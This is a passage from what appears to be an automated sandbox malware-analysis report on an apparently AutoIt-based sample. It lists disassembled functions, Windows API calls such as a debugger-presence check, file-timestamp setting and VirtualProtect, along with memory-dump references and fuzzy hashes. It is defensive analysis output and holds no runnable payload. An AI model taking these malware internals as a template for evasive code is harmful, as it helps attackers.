                                                                                                                    • Opcode Fuzzy Hash: 41d6d90cd4cb5adf509d653c003157bfbe3627cd806ea9c1483d9c23458ae538
                                                                                                                    • Instruction Fuzzy Hash: 4AF14470A083119FCB15DF28D480A6EBBE5FF89314F55892EF8999B252D730E945CF82
                                                                                                                    Function 002B434A Relevance: 4.6, APIs: 3, Instructions: 77windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • _memset.LIBCMT ref: 002B4370
                                                                                                                    • Shell_NotifyIconW.SHELL32(00000000,?), ref: 002B4415
                                                                                                                    • Shell_NotifyIconW.SHELL32(00000001,?), ref: 002B4432
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: IconNotifyShell_$_memset
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1505330794-0
                                                                                                                    • Opcode ID: ca7ea1a0041ef746c6f84c5cf4dad4bb0cf36976a40257e07bf5b3aa336300c1
                                                                                                                    • Instruction ID: 48928f659af0f11d8a09fad13773d2dc4e36dfffa32595fd657da6fcad37f511
                                                                                                                    • Opcode Fuzzy Hash: ca7ea1a0041ef746c6f84c5cf4dad4bb0cf36976a40257e07bf5b3aa336300c1
                                                                                                                    • Instruction Fuzzy Hash: 88316FB05147018FD725EF24D8846DBBBF8FB58348F100D2EE59A86252E7B1A994CB52
                                                                                                                    Function 002D571C Relevance: 4.6, APIs: 3, Instructions: 59memoryCOMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • __FF_MSGBANNER.LIBCMT ref: 002D5733
                                                                                                                      • Part of subcall function 002DA16B: __NMSG_WRITE.LIBCMT ref: 002DA192
                                                                                                                      • Part of subcall function 002DA16B: __NMSG_WRITE.LIBCMT ref: 002DA19C
                                                                                                                    • __NMSG_WRITE.LIBCMT ref: 002D573A
                                                                                                                      • Part of subcall function 002DA1C8: GetModuleFileNameW.KERNEL32(00000000,003733BA,00000104,?,00000001,00000000), ref: 002DA25A
                                                                                                                      • Part of subcall function 002DA1C8: ___crtMessageBoxW.LIBCMT ref: 002DA308
                                                                                                                      • Part of subcall function 002D309F: ___crtCorExitProcess.LIBCMT ref: 002D30A5
                                                                                                                      • Part of subcall function 002D309F: ExitProcess.KERNEL32 ref: 002D30AE
                                                                                                                      • Part of subcall function 002D8B28: __getptd_noexit.LIBCMT ref: 002D8B28
                                                                                                                    • RtlAllocateHeap.NTDLL(00F60000,00000000,00000001,00000000,?,?,?,002D0DD3,?), ref: 002D575F
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1372826849-0
                                                                                                                    • Opcode ID: 740d9bee2b3bbaf52ad7936d423a9620bc0d94b848649a7d13cd5238299098bf
                                                                                                                    • Instruction ID: abb969e0ccca721303dc3b04e03391036e1bdea7c60b64a049f00d5fe02c2f72
                                                                                                                    • Opcode Fuzzy Hash: 740d9bee2b3bbaf52ad7936d423a9620bc0d94b848649a7d13cd5238299098bf
                                                                                                                    • Instruction Fuzzy Hash: E601F931630B22DAF6116B35EC42B6DB74C8B42361F200427F409D6381DEF0CC609A61
                                                                                                                    Function 003198A2 Relevance: 4.5, APIs: 3, Instructions: 24filetimeCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,00319548,?,?,?,?,?,00000004), ref: 003198BB
                                                                                                                    • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,00319548,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 003198D1
                                                                                                                    • CloseHandle.KERNEL32(00000000,?,00319548,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 003198D8
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: File$CloseCreateHandleTime
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3397143404-0
                                                                                                                    • Opcode ID: 51fd767febe7e22b5d188d4aebff12b1cbd004f167042e980b60a7e2a313fb34
                                                                                                                    • Instruction ID: cf04f3b4e64b49de62ce39f659b88ebe75c43e35597500c92ca85c449cee6f39
                                                                                                                    • Opcode Fuzzy Hash: 51fd767febe7e22b5d188d4aebff12b1cbd004f167042e980b60a7e2a313fb34
                                                                                                                    • Instruction Fuzzy Hash: 43E08632940214BBD7231B54EC49FDA7B5DAB06770F104220FB14690E087B125119798
                                                                                                                    Function 00318D0D Relevance: 4.5, APIs: 3, Instructions: 22COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • _free.LIBCMT ref: 00318D1B
                                                                                                                      • Part of subcall function 002D2D55: RtlFreeHeap.NTDLL(00000000,00000000,?,002D9A24), ref: 002D2D69
                                                                                                                      • Part of subcall function 002D2D55: GetLastError.KERNEL32(00000000,?,002D9A24), ref: 002D2D7B
                                                                                                                    • _free.LIBCMT ref: 00318D2C
                                                                                                                    • _free.LIBCMT ref: 00318D3E
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 776569668-0
                                                                                                                    • Opcode ID: 625e2a9df38ff8793e00647abbe9ccf0d6414545c555b0c4696158d27d9f7751
                                                                                                                    • Instruction ID: 0a1358aabe0cc68c0862a1c260fd5d50e61b0c8675794d717dff68ee5027af21
                                                                                                                    • Opcode Fuzzy Hash: 625e2a9df38ff8793e00647abbe9ccf0d6414545c555b0c4696158d27d9f7751
                                                                                                                    • Instruction Fuzzy Hash: 1FE012A161170186CB29A678B940AD353DD4F6D352715091EB40DD7286CE64FC968528
                                                                                                                    Function 002BA9C3 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 534COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: CALL
                                                                                                                    • API String ID: 0-4196123274
                                                                                                                    • Opcode ID: 813ebdda487ddafc0e469f2cd6f3e69d92513fe2db319b807ef21ec6787672b1
                                                                                                                    • Instruction ID: 57e61222cfcb2ae4f31df6efa16ef4aed8ea00b68c7b2f9f4869fec9373d2f6c
                                                                                                                    • Opcode Fuzzy Hash: 813ebdda487ddafc0e469f2cd6f3e69d92513fe2db319b807ef21ec6787672b1
                                                                                                                    • Instruction Fuzzy Hash: 8D226A70528341DFC725DF14C490BAABBE1BF48384F14896DE99A8B362D771EC64CB82
                                                                                                                    Function 002B7A51 Relevance: 3.1, APIs: 2, Instructions: 97COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _memmove
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4104443479-0
                                                                                                                    • Opcode ID: dcaa55ca9a04723143b9e8694f613c9e7f590ea8bac40c6ab2e3bad66fc376f5
                                                                                                                    • Instruction ID: 0d63f9f61eb20721fc35e7f066889ddf9372406f2ffb0c26b67c2b7a2cc4327f
                                                                                                                    • Opcode Fuzzy Hash: dcaa55ca9a04723143b9e8694f613c9e7f590ea8bac40c6ab2e3bad66fc376f5
                                                                                                                    • Instruction Fuzzy Hash: B43189B1624506AFC744DF68C8D1E69F3A5FF88350B15862AE519CB391DB70ED70CB90
                                                                                                                    Function 002B47D0 Relevance: 3.1, APIs: 2, Instructions: 59COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • IsThemeActive.UXTHEME ref: 002B4834
                                                                                                                      • Part of subcall function 002D336C: __lock.LIBCMT ref: 002D3372
                                                                                                                      • Part of subcall function 002D336C: DecodePointer.KERNEL32(00000001,?,002B4849,00307C74), ref: 002D337E
                                                                                                                      • Part of subcall function 002D336C: EncodePointer.KERNEL32(?,?,002B4849,00307C74), ref: 002D3389
                                                                                                                      • Part of subcall function 002B48FD: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 002B4915
                                                                                                                      • Part of subcall function 002B48FD: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 002B492A
                                                                                                                      • Part of subcall function 002B3B3A: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 002B3B68
                                                                                                                      • Part of subcall function 002B3B3A: IsDebuggerPresent.KERNEL32 ref: 002B3B7A
                                                                                                                      • Part of subcall function 002B3B3A: GetFullPathNameW.KERNEL32(00007FFF,?,?,003752F8,003752E0,?,?), ref: 002B3BEB
                                                                                                                      • Part of subcall function 002B3B3A: SetCurrentDirectoryW.KERNEL32(?), ref: 002B3C6F
                                                                                                                    • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 002B4874
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1438897964-0
                                                                                                                    • Opcode ID: b7f797d948ba83e4d710cab104fe38ef773d417e1f63f96f278b77887d506ba5
                                                                                                                    • Instruction ID: a82eddb9bab5209cb5946f812319c356b8834eec3977374c0adc8413ba6ffd29
                                                                                                                    • Opcode Fuzzy Hash: b7f797d948ba83e4d710cab104fe38ef773d417e1f63f96f278b77887d506ba5
                                                                                                                    • Instruction Fuzzy Hash: A7119D719187419FC711EF29EC4594ABBF8EF85790F10491EF149832B2DBB09994CF92
                                                                                                                    Function 002D0DB6 Relevance: 3.0, APIs: 2, Instructions: 44COMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 002D571C: __FF_MSGBANNER.LIBCMT ref: 002D5733
                                                                                                                      • Part of subcall function 002D571C: __NMSG_WRITE.LIBCMT ref: 002D573A
                                                                                                                      • Part of subcall function 002D571C: RtlAllocateHeap.NTDLL(00F60000,00000000,00000001,00000000,?,?,?,002D0DD3,?), ref: 002D575F
                                                                                                                    • std::exception::exception.LIBCMT ref: 002D0DEC
                                                                                                                    • __CxxThrowException@8.LIBCMT ref: 002D0E01
                                                                                                                      • Part of subcall function 002D859B: RaiseException.KERNEL32(?,?,?,00369E78,00000000,?,?,?,?,002D0E06,?,00369E78,?,00000001), ref: 002D85F0
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3902256705-0
                                                                                                                    • Opcode ID: 6628a7d5311cfd68d2bfa502c82d47fecb8c9550f1a3faa1107d894f6d96ffb7
                                                                                                                    • Instruction ID: 1367fd08e042fb90dda28a226967aecccbbd14cec15b4f183a5f4b274fea00a3
                                                                                                                    • Opcode Fuzzy Hash: 6628a7d5311cfd68d2bfa502c82d47fecb8c9550f1a3faa1107d894f6d96ffb7
                                                                                                                    • Instruction Fuzzy Hash: F2F0F43582031A66CB11BAA4EC41ADFB7ACDF05310F10442BF814AA391DFB0AE60CAE1
                                                                                                                    Function 002D55FD Relevance: 3.0, APIs: 2, Instructions: 42COMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: __lock_file_memset
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 26237723-0
                                                                                                                    • Opcode ID: cc5ac7ccb7435f3bc6a89a7dc9f83f5c844a0de579dba9316501353510c7ff88
                                                                                                                    • Instruction ID: bd7641ce1f516009e86c0da2143ae526e394121ad67195d84ad63f090c2d5e70
                                                                                                                    • Opcode Fuzzy Hash: cc5ac7ccb7435f3bc6a89a7dc9f83f5c844a0de579dba9316501353510c7ff88
                                                                                                                    • Instruction Fuzzy Hash: 8B01D471820A19EBCF12AF688C0689E7B65EF50321F548117F8246A391DBB1CE31DF92
                                                                                                                    Function 002D53A6 Relevance: 3.0, APIs: 2, Instructions: 33COMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 002D8B28: __getptd_noexit.LIBCMT ref: 002D8B28
                                                                                                                    • __lock_file.LIBCMT ref: 002D53EB
                                                                                                                      • Part of subcall function 002D6C11: __lock.LIBCMT ref: 002D6C34
                                                                                                                    • __fclose_nolock.LIBCMT ref: 002D53F6
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2800547568-0
                                                                                                                    • Opcode ID: d07ab2b53d99b50d034b0401e0f6aa9947ea643b1bf855783eba146fb8391106
                                                                                                                    • Instruction ID: cd6e415d62e2243797508676ed331c5c37c597dd0e8b4192d12beb245fd3b833
                                                                                                                    • Opcode Fuzzy Hash: d07ab2b53d99b50d034b0401e0f6aa9947ea643b1bf855783eba146fb8391106
                                                                                                                    • Instruction Fuzzy Hash: 27F09071830A159ADB51AF7598067AD7BA06F41374F20824BE464AB3C1CBFC8D619F52
                                                                                                                    Function 011699A8 Relevance: 1.7, APIs: 1, Instructions: 163COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 01169218: GetFileAttributesW.KERNELBASE(?), ref: 01169223
                                                                                                                    • CreateDirectoryW.KERNELBASE(?,00000000), ref: 01169AF2
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2094043687.0000000001168000.00000040.00000020.00020000.00000000.sdmp, Offset: 01168000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_1168000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AttributesCreateDirectoryFile
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3401506121-0
                                                                                                                    • Opcode ID: 4c84fc944b541c2fc07e30a3b9a314b25094fc0e0b01bdc475f563df67d61e3a
                                                                                                                    • Instruction ID: 0f1f6d1c7e3e1f89c54e7ecd4d561518f415f219e5bec347a8fa19ef6ddd17ae
                                                                                                                    • Opcode Fuzzy Hash: 4c84fc944b541c2fc07e30a3b9a314b25094fc0e0b01bdc475f563df67d61e3a
                                                                                                                    • Instruction Fuzzy Hash: 83518231A1520D97EF14EFA4C854BEE737DEF58300F1085A8A609F7280EB7A9B54C7A5
                                                                                                                    Function 002D0C08 Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ProtectVirtual
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 544645111-0
                                                                                                                    • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                                    • Instruction ID: 63bf481e601a4f6f57cd9e677aa91dfe15d9a9bdf10ad46fb3df1541ccc7c170
                                                                                                                    • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                                    • Instruction Fuzzy Hash: 6231A070A201069BC718DF59C4C4A69F7A6FB59300F6486A7E80ACB365DA71EDE1DB80
                                                                                                                    Function 002EFCAC Relevance: 1.6, APIs: 1, Instructions: 88COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ClearVariant
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1473721057-0
                                                                                                                    • Opcode ID: 8bf13d952b1eb2c84af6ca36a191bd53e33dd9edcc8dc5e670c9d07faf9394e1
                                                                                                                    • Instruction ID: d5b121097f5fd5f6ff6dabcfdc9063bd33764af285e20eed6456b75491ca0fbd
                                                                                                                    • Opcode Fuzzy Hash: 8bf13d952b1eb2c84af6ca36a191bd53e33dd9edcc8dc5e670c9d07faf9394e1
                                                                                                                    • Instruction Fuzzy Hash: DD4136745143418FDB25CF24C484B6ABBE0BF49354F0988ACE9998B362C371EC55CF42
                                                                                                                    Function 002D06FE Relevance: 1.6, APIs: 1, Instructions: 74COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 42ba6fa5a3fce640b42b9ba6973db0b820df440f550e9baae2d113647cd6e3c4
                                                                                                                    • Instruction ID: 97dee790345a4c5252c2e70bbcd1e41f4ffa5b89dcfca1247fed7eb624accb7b
                                                                                                                    • Opcode Fuzzy Hash: 42ba6fa5a3fce640b42b9ba6973db0b820df440f550e9baae2d113647cd6e3c4
                                                                                                                    • Instruction Fuzzy Hash: A52126664093815FD7234F38A885BD6BFA4AF82220F0540DFE884CF977C2209C59C7A2
                                                                                                                    Function 002B4DDD Relevance: 1.6, APIs: 1, Instructions: 64libraryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 002B4BB5: FreeLibrary.KERNEL32(00000000,?), ref: 002B4BEF
                                                                                                                      • Part of subcall function 002D525B: __wfsopen.LIBCMT ref: 002D5266
                                                                                                                    • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,003752F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 002B4E0F
                                                                                                                      • Part of subcall function 002B4B6A: FreeLibrary.KERNEL32(00000000), ref: 002B4BA4
                                                                                                                      • Part of subcall function 002B4C70: _memmove.LIBCMT ref: 002B4CBA
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
